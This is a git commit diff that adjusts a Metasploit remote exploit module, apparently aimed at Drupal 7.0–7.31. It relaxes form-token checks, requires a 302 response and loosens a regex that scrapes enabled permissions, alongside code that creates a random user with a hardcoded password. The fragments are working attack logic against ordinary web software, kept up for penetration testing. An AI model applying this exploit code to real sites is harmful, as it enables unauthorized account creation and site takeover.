fix for version 7.0-7.31
This commit is contained in:
parent
9bab77ece6
commit
23b7b8e400
|
@ -101,10 +101,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
form_build_id = $1 if content =~ /name="form_build_id" value="(.+)" \/>/
|
||||
form_token = $1 if content =~ /name="form_token" value="(.+)" \/>/
|
||||
|
||||
unless form_token and form_build_id
|
||||
fail_with(Failure::Unknown, "Could not parse form tokens")
|
||||
end
|
||||
|
||||
vprint_debug("#{peer} - form_build_id: #{form_build_id}")
|
||||
vprint_debug("#{peer} - form_token: #{form_token}")
|
||||
|
||||
|
@ -131,10 +127,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
form_build_id, form_token = extract_form_ids(res.body)
|
||||
|
||||
if form_build_id == nil or form_build_id == ""
|
||||
fail_with(Failure::Unknown, "Could not retrieve form_build_id")
|
||||
end
|
||||
|
||||
user = Rex::Text.rand_text_alpha(10)
|
||||
#pass = Rex::Text.rand_text_alpha(10)
|
||||
# TODO: hardcoded for now
|
||||
|
@ -180,7 +172,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
}
|
||||
})
|
||||
|
||||
unless res
|
||||
unless res and res.code == 302
|
||||
fail_with(Failure::Unknown, "No response or response body, bailing.")
|
||||
end
|
||||
|
||||
|
@ -254,7 +246,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
form_build_id, form_token = extract_form_ids(res.body)
|
||||
|
||||
perm_regex = /name="(.+)" value="(.+)" checked="checked" \/>/
|
||||
perm_regex = /name="(.*)" value="(.*)" checked="checked"/
|
||||
enabled_perms = res.body.to_enum(:scan, perm_regex).map { Regexp.last_match }
|
||||
|
||||
unless enabled_perms
|
||||
|
|
Loading…
Reference in New Issue